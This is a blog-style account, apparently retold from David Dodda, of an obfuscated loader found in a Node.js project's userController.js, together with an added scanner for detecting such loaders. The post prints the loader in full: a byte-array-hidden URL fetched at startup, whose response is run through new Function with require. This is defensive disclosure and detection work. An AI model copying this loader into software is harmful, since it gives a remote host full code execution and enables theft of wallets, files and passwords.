Hacked

David Dodda describes his recent narrow escape from an ingenious hacking attempt.

Before hitting npm start, I threw this prompt at my Cursor AI agent:

“Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn’t be reading, accessing crypto wallets etc.”

And holy sh*t.

Sitting right in the middle of server/controllers/userController.js was this beauty:

```javascript
// The loader as found in server/controllers/userController.js. Shown here with
// comments added; do not run it. `axios` is assumed to have been required
// elsewhere in the controller, so the require is added only to make the
// snippet read stand-alone.
const axios = require('axios');

//Get Cookie   <- attacker's comment; nothing below touches cookies
// Immediately-invoked, so this runs as soon as the module is first required.
(async () => {
    // The target URL is stored as raw byte values, so a grep of the codebase
    // for "http" or the hostname finds nothing.
    const byteArray = [
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
        98, 50, 48, 51, 49, 102, 98, 57
    ];
    // Decoded at runtime into the command-and-control URL.
    const uint8Array = new Uint8Array(byteArray);
    const decoder = new TextDecoder('utf-8');
    axios.get(decoder.decode(uint8Array))
        .then(response => {
            // Second stage: the JSON response's `model` field is JavaScript
            // source. It is compiled with new Function and called with the
            // real `require`, giving it full Node.js access (fs,
            // child_process, network, ...).
            new Function("require", response.data.model)(require);
        })
        // Errors are swallowed, so a dead C2 URL leaves no trace in the logs.
        .catch(error => { });
})();
```

Obfuscated. Sneaky. Evil. And 100% active – embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

I decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9
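As an added example (not part of David Dodda's post and not the attacker's code), here is a small Node.js scan for exactly this loader shape: it pulls numeric array literals out of source text, decodes any that are plausible byte strings, and flags a file where a decoded URL sits alongside a dynamic-execution sink such as `new Function` or `eval`. The sink list and the minimum array length are my choices, and the sample input is the snippet quoted above embedded as a string so the scan runs offline; walking a real tree is left to the caller. One practitioner's note: decoding the bytes exactly as printed on this page yields https://api.npoint.io/2c45861239c3b2031fb9, one character shorter than the URL quoted above, so always trust the bytes in the file over a transcription.

```javascript
'use strict';
// Added example, not code from the post: static scan for the
// "byte array -> URL -> new Function" loader pattern.

// Sinks that turn fetched data into running code (my list, extend as needed).
const SINK_PATTERNS = [
  /\bnew\s+Function\s*\(/,
  /\beval\s*\(/,
  /\brequire\s*\(\s*['"]child_process['"]\s*\)/,
  /\bvm\.(?:runInThisContext|runInNewContext|Script)\b/,
];

// Find every array literal of small integers, e.g. [104, 116, 116, ...], and
// return each one decoded as UTF-8. Arrays shorter than `minLength` are
// skipped to avoid noise from RGB tuples, version numbers and the like.
function decodeByteArrays(source, minLength = 8) {
  const decoded = [];
  const arrayRe = /\[\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*,?\s*\]/g;
  const utf8 = new TextDecoder('utf-8');
  let m;
  while ((m = arrayRe.exec(source)) !== null) {
    const nums = m[1].split(',').map((s) => Number(s.trim()));
    if (nums.length < minLength || nums.some((n) => n > 255)) continue;
    decoded.push(utf8.decode(Uint8Array.from(nums)));
  }
  return decoded;
}

// A decoded string is most interesting when it is a URL; every decoded
// string is still returned so a reviewer can eyeball the rest.
function looksLikeUrl(s) {
  return /^https?:\/\/[^\s'"]+$/.test(s);
}

// Scan one file's source text. `suspicious` is set when a hidden URL and a
// code-execution sink appear in the same file, which is the loader's shape.
function scanSource(source) {
  const decoded = decodeByteArrays(source);
  const urls = decoded.filter(looksLikeUrl);
  const sinks = SINK_PATTERNS.filter((re) => re.test(source)).map((re) => re.source);
  return { decoded, urls, sinks, suspicious: urls.length > 0 && sinks.length > 0 };
}

// Constructed sample input: the userController.js snippet as quoted on this
// page, embedded as a string so the scan runs without touching the network.
const SAMPLE_SOURCE = `
//Get Cookie
(async () => {
    const byteArray = [
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,
        98, 50, 48, 51, 49, 102, 98, 57
    ];
    const uint8Array = new Uint8Array(byteArray);
    const decoder = new TextDecoder('utf-8');
    axios.get(decoder.decode(uint8Array))
        .then(response => {
            new Function("require", response.data.model)(require);
        })
        .catch(error => { });
})();
`;

// Runs the scan over the embedded sample and returns the report.
function scanSample() {
  return scanSource(SAMPLE_SOURCE);
}

console.log(JSON.stringify(scanSample(), null, 2));
```

To use it on a real checkout, read each `.js`/`.ts` file and pass its contents to `scanSource`; anything with `suspicious: true` deserves a human read before `npm start`, and the `decoded` list is worth skimming even when no URL is found, since the same trick hides hostnames, file paths and wallet directory names just as easily.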

When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything – crypto wallets, files, passwords, your entire digital existence.

Here’s the kicker: the URL died exactly 24 hours later. These guys weren’t messing around – they had their infrastructure set up to burn evidence fast.

AI saved the day.
